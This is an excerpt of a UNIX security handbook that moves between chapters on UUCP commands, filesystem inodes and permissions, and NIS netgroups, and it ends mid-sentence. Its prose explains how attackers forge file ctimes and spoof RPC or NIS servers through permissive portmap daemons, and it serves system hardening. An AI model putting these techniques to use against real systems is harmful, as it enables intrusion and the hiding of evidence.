Thus, while UUCP is still used by a number of legacy systems, few sites are installing new UUCP systems.<br />

Nevertheless, a working knowledge of UUCP is still important for the UNIX system administrator for a number of reasons:

● Even if you don't use UUCP, you probably have the UUCP programs on your system. If they are improperly installed, an attacker could use those programs to gain further access.[1]

    [1] For this reason, you may wish to remove the UUCP subsystem (or remove the SUID/SGID permissions from the various UUCP executables) if you have no intention of using it.

● If you are a newly hired administrator for an existing system, people could be using UUCP on your system without your knowledge.

● The UUCP programs are still used by many sites to exchange netnews. Thus, your computer may be using UUCP without anybody's knowledge.[2]

    [2] Rich Salz's Internet News system (INN) provides an excellent means for sites on the Internet to exchange netnews without relying on UUCP.

The Nutshell Handbook Using and Managing UUCP (<strong>O'Reilly</strong> & Associates) describes in detail how to set up and<br />

run a UUCP system, as well as how to connect to the Usenet. This chapter focuses solely on those aspects of UUCP<br />

that relate to computer security.<br />

15.1 About UUCP<br />

From the user's point of view, UUCP consists of two main programs:

● uucp, which copies files between computers
● uux, which executes programs on remote machines

<strong>UNIX</strong>'s electronic mail system also interfaces with the UUCP system. As most people use UUCP primarily for mail,<br />

this chapter also discusses the mail and rmail commands.<br />

15.1.1 uucp Command<br />

The uucp command allows you to transfer files between two <strong>UNIX</strong> systems. The command has the form:<br />

uucp [flags] source-file destination-file<br />

UUCP filenames can be regular pathnames (such as /tmp/file1) or can have the form:<br />

system-name!pathname<br />

For example, to transfer the /tmp/file12 file from your local machine to the machine idr, you might use the command:<br />

$ uucp /tmp/file12 idr!/tmp/file12<br />

$<br />


You can also use uucp to transfer a file between two remote computers, assuming that your computer is connected to<br />

both of the other two machines. For example, to transfer a file from prose to idr, you might use the command:<br />

$ uucp prose!/tmp/myfile idr!/u1/lance/yourfile<br />

$<br />

For security reasons, UUCP is usually configured so that files can be copied only into the /usr/spool/uucppublic<br />

directory: the UUCP public directory. Because /usr/spool/uucppublic is lengthy to type, UUCP allows you to<br />

abbreviate the entry with a tilde (~):<br />

$ uucp file12 idr!~/anotherfile<br />

$<br />

Notice that you can change the name of a file when you send it.<br />

15.1.1.1 uucp with the C shell<br />

The above examples were all typed with sh, the Bourne shell. They will not work as is with the C shell. The reason<br />

for this is the csh history feature.[3]<br />

[3] The ksh also has a history mechanism, but it does not use a special character that interferes with<br />

other programs.<br />

The C shell's history feature interprets the exclamation mark as a command to recall previously typed lines. As a<br />

result, if you are using csh and you wish to have the exclamation mark sent to the uucp program, you have to quote,<br />

or "escape," the exclamation mark with a backslash:<br />

% uucp /tmp/file12 idr\!/tmp/file12<br />

%<br />

15.1.2 uux Command<br />

The uux command enables you to execute a command on a remote system. In its simplest form, uux reads an input<br />

file from standard input to execute a command on a remote computer. The command has the form:<br />

uux - system\!command < inputfile<br />

In the days before local area networks, uux was often used to print a file from one computer on the printer of another.<br />

For sites that don't have local area networks, uux is still useful for that purpose. For example, to print the file report<br />

on the computer idr, you might use the command:<br />

$ uux - "idr!lpr" < report<br />

$<br />

The notation idr!lpr causes the lpr command to be run on the computer called idr. Standard input for the lpr<br />

command is read by the UUCP system and transferred to the machine idr before the command is run.<br />

Today, the main use of uux is to send mail and Usenet articles between machines that are not otherwise connected to<br />

LANS or the <strong>Internet</strong>.<br />

You can use the uux command to send mail "by hand" from one computer to another by running the program rmail on a remote machine:

$ uux - "idr!rmail leon"
Hi, Leon!
How is it going?
Sincerely,
Mortimer
^D
$

The hyphen (-) option to the uux command means that uux should take its input from standard input and run the command rmail leon on the machine idr. The message will be sent to the user leon.

15.1.3 mail Command<br />

Because people send mail a lot, the usual <strong>UNIX</strong> mail command understands UUCP-style addressing, and<br />

automatically invokes uux when in use. [4]<br />

[4] There are many different programs that can be used to send mail. Most of them either understand<br />

UUCP addressing or give your message to another program, such as sendmail, that does.<br />

For example, you could send mail to leon on the idr machine simply by typing:<br />

$ mail idr!leon<br />

Subject: Hi, Leon!<br />

How is it going?<br />

Sincerely,<br />

Mortimer<br />

^D<br />

$<br />

When mail processes a mail address containing an exclamation mark, the program automatically invokes the uux command to cause the mail message to be transmitted to the recipient machine.

15.1.4 How the UUCP Commands Work<br />

uucp, uux, and mail don't actually transmit information to the remote computer; they simply store it on the local<br />

machine in a spool file. The spool file contains the names of files to transfer to the remote computer and the names<br />

of programs to run after the transfer takes place. Spool files are normally kept in the /usr/spool/uucp directory (or a<br />

subdirectory inside this directory).<br />

If the uux command is invoked without its -r option, the uucico (<strong>UNIX</strong>-to-<strong>UNIX</strong> Copy-In-Copy-Out) program is<br />

executed immediately.[5] In many applications, such as in sending email, the -r option is provided by default, and<br />

the commands are queued until the uucp queue is run at some later time. Normally, uucico is run on a regular basis<br />

by cron. However started, when the program uucico runs it initiates a telephone call to the remote computer and<br />

sends out the spooled files. If the phone is busy or for some other reason uucico is unable to transfer the spool files,<br />

they remain in the /usr/spool/uucp directory, and uucico tries again when it is run by cron or another invocation of<br />

uux.<br />

[5] A few versions of UUCP support a -L flag to uux that acts opposite to the -r flag, and causes uucico<br />

to be started immediately.<br />
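If you want to see what is waiting in the queue, most UUCP implementations include a uustat command. The options below are a sketch and differ slightly between UUCP versions, so check your manual page:

$ uustat -a
$ uustat -q

The first form lists every queued job; the second summarizes the jobs queued for each remote system.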

When it calls the remote computer, uucico gets the login: and password: prompts as does any other user. uucico<br />

replies with a special username and password for logging into a special account. This account, sometimes named<br />

uucp or nuucp, has another copy of the uucico program as its shell; the uucico program that sends the files operates<br />

in the Master mode, while the uucico program receiving the files operates in the Slave mode.<br />

The /etc/passwd entry for the special uucp user often looks similar to this:<br />

uucp:mdDF32KJqwerk:4:4:Mr. UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico<br />


After the files are transferred, a program on the remote machine named uuxqt executes the queued commands. Any<br />

errors encountered during remote command execution are captured and sent back as email to the initiating user on<br />

the first machine.<br />


Chapter 5<br />

5. The <strong>UNIX</strong> Filesystem<br />

Contents:<br />

Files<br />

Using File Permissions<br />

The umask<br />

Using Directory Permissions<br />

SUID<br />

Device Files<br />

chown: Changing a File's Owner<br />

chgrp: Changing a File's Group<br />

Oddities and Dubious Ideas<br />

Summary<br />

The <strong>UNIX</strong> filesystem controls the way that information in files and directories is stored on disk and other forms of<br />

secondary storage. It controls which users can access what items and how. The filesystem is therefore one of the most<br />

basic tools for enforcing <strong>UNIX</strong> security on your system.<br />

Information stored in the <strong>UNIX</strong> filesystem is arranged as a tree structure of directories and files. The tree is<br />

constructed from directories and subdirectories within a single directory, which is called the root. [1] Each directory,<br />

in turn, can contain other directories or entries such as files, pointers (symbolic links) to other parts of the filesystem,<br />

logical names that represent devices (such as /dev/tty), and many other types.[2]<br />

[1] This is where the "root" user (superuser) name originates: the owner of the root of the filesystem.<br />

[2] For example, the <strong>UNIX</strong> "process" filesystem in System V contains entries that represent processes<br />

that are currently executing.<br />

This chapter explains, from the user's point of view, how the filesystem represents and protects information.<br />

5.1 Files<br />

From the simplest perspective, everything visible to the user in a UNIX system can be represented as a "file" in the filesystem - including processes and network connections. Almost all of these items are represented as "files," each having at least one name, an owner, access rights, and other attributes. This information is actually stored in the filesystem in an inode (index node), the basic filesystem entry. An inode stores everything about a filesystem entry except its name; the names are stored in directories and are associated with pointers to inodes.


5.1.1 Directories<br />

One special kind of entry in the filesystem is the directory. A directory is nothing more than a simple list of names and<br />

inode numbers. A name can consist of any string of any characters with the exception of a "/" character and the "null"<br />

character (usually a zero byte).[3] There is a limit to the length of these strings, but it is usually quite long: 1024 or<br />

longer on many modern versions of <strong>UNIX</strong>; older AT&T versions limit names to 14 characters or less.<br />

[3] Some versions of <strong>UNIX</strong> may further restrict the characters that can be used in filenames and directory<br />

names.<br />

These strings are the names of files, directories, and the other objects stored in the filesystem. Each name can contain<br />

control characters, line feeds, and other characters. This can have some interesting implications for security, and we'll<br />

discuss those later in this and other chapters.<br />

Associated with each name is a numeric pointer that is actually an index on disk for an inode. An inode contains<br />

information about an individual entry in the filesystem; these contents are described in the next section.<br />

Nothing else is contained in the directory other than names and inode numbers. No protection information is stored<br />

there, nor owner names, nor data. The directory is a very simple relational database that maps names to inode<br />

numbers. No restriction on how many names can point to the same inode exists, either. A directory may have 2, 5, or<br />

50 names that each have the same inode number. In like manner, several directories may have names that associate to<br />

the same inode. These are known as links [4] to the file. There is no way of telling which link was the first created, nor<br />

is there any reason to know: all the names are equal in what they access. This is often a confusing idea for beginning<br />

users as they try to understand the "real name" for a file.<br />

[4] These are hard links or direct links. Some systems support a different form of pointer, known as a<br />

symbolic link, that behaves in a different way.<br />

This also means that you don't actually delete a file with commands such as rm. Instead, you unlink the name - you sever the connection between the filename in a directory and the inode number. If another link still exists, the file will continue to exist on disk. After the last link is removed, and the file is closed, the kernel will reclaim the storage because there is no longer a method for a user to access it.
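You can watch this happen with a short session at the shell. The sketch below assumes an existing file named report; the -i option to ls prints each name's inode number, and the numbers on your system will of course differ.

$ ln report report.copy
$ ls -li report report.copy
$ rm report
$ ls -li report.copy

After the ln, both names show the same inode number and a link count of 2; after the rm, the data is still reachable through report.copy, whose link count drops back to 1.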

Every normal directory has two names always present. One entry is for "." (dot), and this is associated with the inode<br />

for the directory itself; it is self-referential. The second entry is for ".." (dot-dot), which points to the "parent" of this<br />

directory - the directory next closest to the root in the tree-structured filesystem. The exception is the root directory<br />

itself, named "/". In the root directory, ".." is also a link to "/".<br />

5.1.2 Inodes<br />

For each object in the filesystem, <strong>UNIX</strong> stores administrative information in a structure known as an inode. Inodes<br />

reside on disk and do not have names. Instead, they have indices (numbers) indicating their positions in the array of<br />

inodes.<br />

Each inode generally contains:

● The location of the item's contents on the disk, if any
● The item's type (e.g., file, directory, symbolic link)
● The item's size, in bytes, if applicable
● The time the file's inode was last modified (the ctime)
● The time the file's contents were last modified (the mtime)
● The time the file was last accessed (the atime) for read(), exec(), etc.
● A reference count: the number of names the file has
● The file's owner (a UID)
● The file's group (a GID)
● The file's mode bits (also called file permissions or permission bits)

The last three pieces of information, stored for each item, and coupled with UID/GID information about executing<br />

processes, are the fundamental data that <strong>UNIX</strong> uses for practically all operating system security.<br />

Other information can also be stored in the inode, depending on the particular version of <strong>UNIX</strong> involved. Some<br />

systems may also have other nodes such as vnodes, cnodes, and so on. These are simply extensions to the inode<br />

concept to support foreign files, RAID[5] disks, or other special kinds of filesystems. We'll confine our discussion to<br />

inodes, as that abstraction contains most of the information we need.<br />

[5] RAID means Redundant Array of Inexpensive Disks. It is a technique for combining many low-cost<br />

hard disks into a single unit that offers improved performance and reliability.<br />

Figure 5.1 shows how information is stored in an inode.<br />

Figure 5.1: Files and inodes<br />

5.1.3 Current Directory and Paths<br />

Every item in the filesystem with a name can be specified with a pathname. The word pathname is appropriate<br />

because a pathname represents the path to the entry from the root of the filesystem. By following this path, the system<br />

can find the inode of the referenced entry.<br />

Pathnames can be absolute or relative. Absolute pathnames always start at the root, and thus always begin with a "/", representing the root directory. Thus, a pathname such as /homes/mortimer/bin/crashme represents a pathname to an item starting at the root directory.

A relative pathname always starts interpretation from the current directory of the process referencing the item. This concept implies that every process has associated with it a current directory. Each process inherits its current directory from a parent process after a fork (see Appendix C, UNIX Processes). The current directory is initialized at login from the sixth field of the user record in the /etc/passwd file: the home directory. The current directory is then updated every time the process performs a change-directory operation (chdir or cd). Relative pathnames also imply that the current directory is at the front of the given pathname. Thus, after executing the command cd /usr, the relative pathname lib/makekey would actually be referencing the pathname /usr/lib/makekey. Note that any pathname that doesn't start with a "/" must be relative.

5.1.4 Using the ls Command<br />

You can use the ls command to list all of the files in a directory. For instance, to list all the files in your current<br />

directory, type:<br />

% ls -a<br />

instructions letter notes<br />

invoice more-stuff stats<br />

%<br />

You can get a more detailed listing by using the ls -lF command:<br />

% ls -lF
total 161
-rw-r--r--  1 sian  user      505 Feb  9 13:19 instructions
-rw-r--r--  1 sian  user     3159 Feb  9 13:14 invoice
-rw-r--r--  1 sian  user     6318 Feb  9 13:14 letter
-rw-------  1 sian  user    15897 Feb  9 13:20 more-stuff
-rw-r-----  1 sian  biochem  4320 Feb  9 13:20 notes
-rwxr-xr-x  1 sian  user   122880 Feb  9 13:26 stats*
%

The first line of output generated by the ls command ("total 161" in the example above) indicates the number of<br />

kilobytes taken up by the files in the directory.[6] Each of the other lines of output contains the fields, from left to<br />

right, as described in Table 5.1.<br />

[6] Some older versions of <strong>UNIX</strong> reported this in 512-byte blocks rather than in kilobytes.<br />

Table 5.1: ls Output

Field Contents   Meaning
-                The file's type; for regular files, this field is always a dash
rw-r--r--        The file's permissions
1                The number of "hard" links to the file; the number of "names" for the file
sian             The name of the file's owner
user             The name of the file's group
505              The file's size, in bytes
Feb 9 13:19      The file's modification time
instructions     The file's name

The ls -F option makes it easier for you to understand the listing by printing a special character after the filename to<br />

indicate what it is, as shown in Table 5.2.<br />

Table 5.2: ls -F Tag Meanings

Symbol    Meaning
(blank)   Regular file or named pipe (FIFO[7])
*         Executable program or command file
/         Directory
=         Socket
@         Symbolic link

[7] A FIFO is a First-In, First-Out buffer, which is a special kind of named pipe.

Thus, in the directory shown earlier, the file stats is an executable program file; the rest of the files are regular text<br />

files.<br />

The -g option to the ls command alters the output, depending on the version of <strong>UNIX</strong> being used.<br />

If you are using the Berkeley-derived version of ls,[8] you must use the ls -g option to display the file's group in addition to the file's owner:

[8] On Solaris systems, this program is named /usr/ucb/ls.<br />

% ls -lFg<br />

total 161<br />

-rw-r--r-- 1 sian user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 sian user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 sian user 6318 Feb 9 13:14 letter<br />

-rw------- 1 sian user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 sian biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 sian user 122880 Feb 9 13:26 stats*<br />

%<br />

If you are using an AT&T-derived version of ls,[9] using the -g option causes the ls command to only display the file's<br />

group:<br />

[9] On Solaris systems, this program is named /bin/ls.<br />

% ls -lFg<br />

total 161<br />

-rw-r--r-- 1 user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 user 6318 Feb 9 13:14 letter<br />

-rw------- 1 user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 user 122880 Feb 9 13:26 stats*<br />

%<br />

5.1.5 File Times<br />

The times shown with the ls -l command are the modification times of the files (mtime). You can obtain the time of last access (the atime) by providing the -u option (for example, by typing ls -lu). Both of these time values can be changed with a call to a system library routine.[10] Therefore, as the system administrator, you should be in the habit of checking the inode change time (ctime) by providing the -c option; for example, ls -lc. You can't reset the ctime of a file under normal circumstances. It is updated by the operating system whenever any change is made to the inode for the file.

[10] utimes()

Because the inode changes when the file is modified, ctime reflects the time of last writing, protection change, or change of owner. An attacker may change the mtime or atime of a file, but the ctime will usually be correct.
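As a quick reference, the three times can be listed for a single file with the three forms of the command (the filename notes is just an example from the listing earlier in this chapter):

$ ls -l notes
$ ls -lu notes
$ ls -lc notes

The first command lists the mtime, the second the atime, and the third the ctime.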



Note that we said "usually." A clever attacker who gains superuser status can change the system clock and then touch<br />

the inode to force a misleading ctime on a file. Furthermore, an attacker can change the ctime by writing to the raw<br />

disk device and bypassing the operating system checks altogether. And if you are using Linux with the ext2<br />

filesystem, an attacker can modify the inode contents directly using the debugfs command.<br />

For this reason, if the superuser account on your system has been compromised, you should not assume that any of the<br />

three times stored with any file or directory are correct.<br />

NOTE: Some programs will change the ctime on a file without actually changing the file itself. This can<br />

be misleading when you are looking for suspicious activity. The file command is one such offender. The<br />

discrepancy occurs because file opens the file for reading to determine its type, thus changing the atime<br />

on the file. By default, most versions of file then reset the atime to its original value, but in so doing<br />

change the ctime. Some security scanning programs use the file program within them (or employ similar<br />

functionality), and this may result in wide-scale changes in ctime unless they are run on a read-only<br />

version of the filesystem.<br />

5.1.6 Understanding File Permissions<br />

The file permissions on each line of the ls listing tell you what the file is and what kind of file access (that is, ability to<br />

read, write, or execute) is granted to various users on your system.<br />

Here are two examples of file permissions:<br />

-rw-------<br />

drwxr-xr-x<br />

The first character of the file's mode field indicates the type of file described in Table 5.3.<br />

Table 5.3: File Types

Contents   Meaning
-          Plain file
d          Directory
c          Character device (tty or printer)
b          Block device (usually disk or CD-ROM)
l          Symbolic link (BSD or V.4)
s          Socket (BSD or V.4)
= or p     FIFO (System V, Linux)

The next nine characters taken in groups of three indicate who on your computer can do what with the file. There are three kinds of permissions:

r
    Permission to read
w
    Permission to write
x
    Permission to execute

Similarly, there are three classes of permissions:

owner
    The file's owner
group
    Users who are in the file's group
other
    Everybody else on the system (except the superuser)

In the ls -l command, privileges are illustrated graphically (see Figure 5.2).<br />

Figure 5.2: Basic permissions<br />
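In plain text, the layout that the figure illustrates looks roughly like this (a sketch, using the drwxr-xr-x example shown above):

d rwx r-x r-x
|  |   |   |
|  |   |   +--  other: everybody else on the system
|  |   +-----  group: users in the file's group
|  +--------  owner: the file's owner
+-----------  file type (d = directory)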

5.1.7 File Permissions in Detail<br />

The terms read, write, and execute have very specific meanings for files, as shown in Table 5.4.<br />

Table 5.4: File Permissions

r (READ)
    Read access means exactly that: you can open a file with the open() system call and you can read its contents with read().

w (WRITE)
    Write access means that you can overwrite the file with a new one or modify its contents. It also means that you can use write() to make the file longer or truncate() or ftruncate() to make the file shorter.

x (EXECUTE)
    Execute access makes sense only for programs. If a file has its execute bits set, you can run it by typing its pathname (or by running it with one of the family of exec() system calls). How the program gets executed depends on the first two bytes of the file. The first two bytes of an executable file are assumed to be a magic number indicating the nature of the file. Some numbers mean that the file is a certain kind of machine code file. The special two-byte sequence "#!" means that it is an executable script of some kind. Anything with an unknown value is assumed to be a shell script and is executed accordingly.

File permissions apply to devices, named sockets, and FIFOS exactly as they do for regular files. If you have write<br />

access, you can write information to the file or other object; if you have read access, you can read from it; and if you<br />

don't have either access, you're out of luck.<br />

File permissions do not apply to symbolic links. Whether or not you can read the file pointed to by a symbolic link<br />

depends on the file's permissions, not the link's. In fact, symbolic links are almost always created with a file<br />

permission of "rwxrwxrwx" (or mode 0777, as explained later in this chapter) and are ignored by the operating<br />

system.[11]<br />

[11] Apparently, some vendors have found a use for the mode bits inside a symbolic link's inode. HP-UX 10.0 uses the sticky bit of symbolic links to indicate "transition links" - portability links to ease the transition from previous releases to the new SVR4 filesystem layout.

Note the following facts about file permissions:

● You can have execute access without having read access. In such a case, you can run a program without reading it. This ability is useful if you wish to hide the function of a program. Another use is to allow people to execute a program without letting them make a copy of the program (see the note later in this section).

● If you have read access but not execute access, you can make a copy of the file and run it for yourself. The copy, however, will be different in two important ways: it will have a different absolute pathname, and it will be owned by you rather than by the original program's owner.

● On some versions of UNIX (including Linux), an executable command script must have both its read and execute bits set to allow people to run it. (The sketch below illustrates the difference.)
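
The difference is easy to demonstrate from the shell. The following is a minimal sketch, using a hypothetical compiled program /usr/local/bin/report and a hypothetical shell script /usr/local/bin/report.sh; the exact error messages vary from system to system:

% chmod 711 /usr/local/bin/report          execute-only on a compiled program
% /usr/local/bin/report                    runs normally; the kernel reads the file for you
% cp /usr/local/bin/report /tmp/mine
cp: /usr/local/bin/report: Permission denied
% chmod 711 /usr/local/bin/report.sh       execute-only on a shell script
% /usr/local/bin/report.sh                 fails on many systems; the shell itself must read the script
/usr/local/bin/report.sh: Permission denied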

Most people think that file permissions are pretty basic stuff. Nevertheless, many <strong>UNIX</strong> systems have had security<br />

breaches because their file permissions are not properly set.<br />

NOTE: Sun's Network Filesystem (NFS) servers allow a client to read any file that has either the read or<br />

the execute permission set. They do so because there is no difference, from the NFS server's point of<br />

view, between a request to read the contents of a file by a user who is using the read() system call and a<br />

request to execute the file by a user who is using the exec() system call. In both cases, the contents of the<br />

file need to be transferred from the NFS server to the NFS client. (For a detailed description, see Chapter<br />

20, NFS.)<br />


Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

19.4 Sun's Network Information Service (NIS)<br />

Sun's Network Information Service (NIS) is a distributed database system that lets many computers share password files,<br />

group files, host tables, and other files over the network. Although the files appear to be available on every computer, they<br />

are actually stored on only a single computer, called the NIS master server (and possibly replicated on a backup, or slave<br />

server). The other computers on the network, NIS clients, can use the databases stored on the master server (like<br />

/etc/passwd) as if they were stored locally. These databases are called NIS maps.<br />

With NIS, a large network can be managed more easily because all of the account and configuration information (such as the /etc/passwd file) needs to be stored on only a single machine.

Some files are replaced by their NIS maps. Other files are augmented. For these files, NIS uses the plus sign ( +) to tell the<br />

system that it should stop reading the file (e.g., /etc/passwd) and should start reading the appropriate map (e.g., passwd).<br />

The plus sign tells the <strong>UNIX</strong> programs that scan that database file to ask the NIS server for the remainder of the file. The<br />

server retrieves this information from the NIS map. The server maintains multiple maps; these maps normally correspond<br />

to files stored in the /etc directory such as /etc/passwd, /etc/hosts, and /etc/services. This structure is shown in Figure 19.1.<br />

For example, the /etc/passwd file on a client might look like this:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+::0:0:::<br />

This causes the program reading /etc/passwd on the client to make a network request to read the passwd map on the server.<br />

Normally, the passwd map is built from the server's /etc/passwd file, although this need not necessarily be the case.<br />

Figure 19.1: How NIS works<br />


19.4.1 Including or excluding specific accounts:<br />

You can restrict the importing of accounts to particular users by following the "+" symbol with a particular username. For<br />

example, to include only the user george from your NIS server, you could use the following entry in your /etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+george::120:5:::<br />

Note that we have included george's UID and GID. You must include the UID so that the function getpwuid() will work<br />

properly. However, getpwuid() actually goes to the NIS map and overrides the UID and GID values that you specify.<br />

You can also exclude certain usernames from being imported by inserting a line that begins with a minus sign. When NIS<br />

is scanning the /etc/passwd file, it will stop when it finds the first line that matches. Therefore, if you wish to exclude a<br />

specific account but include others that are on the server, you must place the lines beginning with the minus sign before the<br />

lines beginning with the "+" symbol.<br />

For example, to exclude zachary's account and to include the others from the server, you might use the following<br />

/etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

-zachary:::2001:102::<br />

+::0:0:::<br />

Note again that we have included zachary's UID and GID.<br />

19.4.2 Importing accounts without really importing accounts<br />

NIS allows you to selectively import some fields from the /etc/passwd database but not others. For example, if you have<br />

the following entry in your /etc/passwd file:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh<br />

+:*:0:0:::<br />

Then all of the entries in the NIS passwd map will be imported, but each will have its password entry changed to *,<br />

effectively preventing it from being used on the client machine.<br />

Why might you want to do that? Well, by importing the entire map, you get all the UIDs and account names, so that ls -l invocations show the owner of files and directories as usernames. The entry also allows the ~user notation in the various shells to correctly map to the user's home directory (assuming that it is mounted using NFS).
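
You can check the effect from a client. A minimal sketch, using a hypothetical NIS account named george (ypmatch queries the map directly, while the login attempt is refused because the client substitutes * for the password field):

% ypmatch george passwd          the raw map entry, as held by the NIS server
% ls -l ~george                  ~user expansion and username display still work
% su george
Password:
su: Sorry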

19.4.3 NIS Domains<br />

When you configure an NIS server, you must specify an NIS domain. These domains are not the same as DNS domains.<br />

While DNS domains specify a region of the <strong>Internet</strong>, NIS domains specify an administrative group of machines.<br />

The <strong>UNIX</strong> domainname command is used to display and to change your domainname. Without an argument, the command<br />

prints the current domain:<br />

% domainname<br />

EXPERT<br />

%<br />

You can specify an argument to change your domain:<br />

# domainname BAR-BAZ<br />

#<br />

Note that you must be the superuser to set your computer's domain. Under Solaris 2.x, the computer's domainname is<br />

stored in the file /etc/defaultdomain, and set automatically on system startup by the shell script /etc/rc2.d/S69inet. A<br />

computer can only be in one NIS domain at a time, but it can serve any number of NIS domains.<br />


NOTE: Although you might be tempted to use your Internet domain as your NIS domain, we strongly recommend against this. Setting the two domains to the same name has caused problems with some versions of sendmail. It is also a security problem to use an NIS domain that can be easily guessed. Hacker toolkits that attempt to exploit NIS or NFS bugs almost always try variations of the Internet domainname as the NIS domainname before trying anything else. (Of course, the domainname can still be determined in other ways.)

19.4.4 NIS Netgroups<br />

NIS netgroups allow you to create groups for users or machines on your network. Netgroups are similar in principle to<br />

<strong>UNIX</strong> groups for users, but they are much more complicated.<br />

The primary purpose of netgroups is to simplify your configuration files, and to give you less opportunity to make a<br />

mistake. By properly specifying and using netgroups, you can increase the security of your system by limiting the<br />

individuals and the machines that have access to critical resources.<br />

The netgroup database is kept on the NIS master server in the file /etc/netgroup or /usr/etc/netgroup. This file consists of<br />

one or more lines that have the form:<br />

groupname member1 member2 ...<br />

Each member can specify a host, a user, and a NIS domain. The members have the form:<br />

(hostname, username, domainname)<br />

If a username is not included, then every user at the host hostname is a member of the group. If a domainname is not<br />

provided, then the current domain is assumed.[11]<br />

[11] It is generally a dangerous practice to create netgroups with both users and hosts; doing so makes<br />

mistakes somewhat more likely.<br />

Here are some sample netgroups:<br />

Profs (cs,bruno,hutch) (cs,art,hutch)<br />

This statement creates a netgroup called Profs, which is defined to be the users bruno and art on the machine cs in<br />

the domain hutch.<br />

Servers (oreo,,) (choco,,) (blueberry,,)<br />

This statement creates a netgroup called Servers, which matches any user on the machines oreo, choco, or blueberry.<br />

Karen_g (,karen,)<br />

This statement creates a netgroup called Karen_g which matches the user karen on any machine.<br />

Universal (,,)

This statement creates the Universal netgroup, which matches anybody on any machine.<br />

MachinesOnly ( , - , )<br />

This statement creates a netgroup that matches all hostnames in the current domain, but which has no user entries. In<br />

this case, the minus sign is used as a negative wildcard.<br />

19.4.4.1 Setting up netgroups<br />

The /etc/yp/makedbm program (sometimes found in /usr/etc/yp/makedbm) processes the netgroup file into a number of<br />

database files that are stored in the files:<br />

/etc/yp/domainname/netgroup.dir<br />

/etc/yp/domainname/netgroup.pag<br />

/etc/yp/domainname/netgroup.byuser.dir<br />

/etc/yp/domainname/netgroup.byuser.pag<br />


/etc/yp/domainname/netgroup.byhost.dir<br />

/etc/yp/domainname/netgroup.byhost.pag<br />

Note that /etc/yp may be symbolically linked to /var/yp on some machines.<br />
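
After editing the netgroup file, the maps must be rebuilt and pushed to any slave servers before clients will see the change. A minimal sketch, assuming a Sun-style NIS Makefile in /var/yp (pathnames and make targets vary by vendor, so check your documentation):

# cd /var/yp
# make netgroup              rebuild and push the netgroup maps
# ypcat -k netgroup          confirm that clients now see the new entries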

If you have a small organization, you might simply create two netgroups: one for all of your users, and a second for all of<br />

your client machines. These groups will simplify the creation and administration of your system's configuration files.<br />

If you have a larger organization, you might create several groups. For example, you might create a group for each<br />

department's users. You could then have a master group that consists of all of the subgroups. Of course, you could do the<br />

same for your computers as well.<br />

Consider the following science department:<br />

Math (mathserve,,) (math1,,) (math2,,) (math3,,)<br />

Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)<br />

Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)<br />

Science Math Chemistry Biology<br />

Netgroups are important for security because you use them to limit which users or machines on the network can access<br />

information stored on your computer. You can use netgroups in NFS files to limit who has access to the partitions, and in<br />

data files such as /etc/passwd, to limit which entries are imported into a system.<br />

19.4.4.2 Using netgroups to limit the importing of accounts<br />

You can use the netgroups facility to control which accounts are imported by the file /etc/passwd. For example, if you<br />

want to simply import accounts for a specific netgroup, then follow the plus sign (+) with an at sign (@) and a netgroup:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+@operators::0:0:::

The above will bring in the NIS password map entry for the users listed in the operators group.<br />

You can also exclude users or groups if you list the exclusions before you list the netgroups. For example:<br />

root:si4N0jF9Q8JqE:0:1:Mr. Root:/:/bin/sh
-george::120:5:::
-@suspects::0:0:::
+::0:0:::

The above will include all NIS password map entries except for user george and any users in the suspects netgroup.<br />

NOTE: The +@netgroup and -@netgroup notation does not work on all versions of NIS, and does not work<br />

reliably on others. If you intend to use these features, check your system to verify that they are behaving as<br />

expected. Simply reading your documentation is not sufficient.<br />

19.4.4.3 Limitations with NIS<br />

NIS has been the starting point for many successful penetrations into <strong>UNIX</strong> networks. Because NIS controls user accounts,<br />

if you can convince an NIS server to broadcast that you have an account, you can use that fictitious account to break into a<br />

client on the network. NIS can also make confidential information, such as encrypted password entries, widely available.<br />

19.4.4.4 Spoofing RPC<br />

There are design flaws in the code of the NIS implementations of several vendors that allow a user to reconfigure and<br />

spoof the NIS system. This spoofing can be done in two ways: by spoofing the underlying RPC system, and by spoofing<br />

NIS.<br />

The NIS system depends on the functioning of the portmap service. This is a daemon that matches supplied service names<br />

for RPC with IP port numbers at which those services can be contacted. Servers using RPC will register themselves with<br />

portmap when they start, and will remove themselves from the portmap database when they exit or reconfigure.<br />

Early versions of portmap allowed any program to register itself as an RPC server, allowing attackers to register their own<br />


NIS servers and respond to requests with their own password files. Sun's current version of portmap rejects requests to<br />

register or delete services if they come from a remote machine, or if they refer to a privileged port and come from a<br />

connection initiated from a nonprivileged port. Thus, in Sun's current version, only the superuser can make requests that<br />

add or delete service mappings to privileged ports, and all requests can only be made locally. However, not every vendor's<br />

version of the portmap daemon performs these checks. The result is that an attacker might be able to replace critical RPC<br />

services with his own, booby-trapped versions.<br />

Note that NFS and some NIS services often register on unprivileged ports, even in SunOS. In theory, even with the checks<br />

outlined above, an attacker could replace one of these services with a specially written program that would respond to<br />

system requests in a way that would compromise system security. This would require some in-depth understanding of the<br />

protocols and relationships of the programs, but these are well-documented and widely known.<br />

19.4.4.5 Spoofing NIS<br />

NIS clients get information from a NIS server through RPC calls. A local daemon, ypbind, caches contact information for<br />

the appropriate NIS server daemon, ypserv. The ypserv daemon may be local or remote.<br />

Under early SunOS versions of the NIS service (and current versions by some vendors), it was possible to instantiate a<br />

program that acted like ypserv and responded to ypbind requests. The local ypbind daemon could then be instructed to use<br />

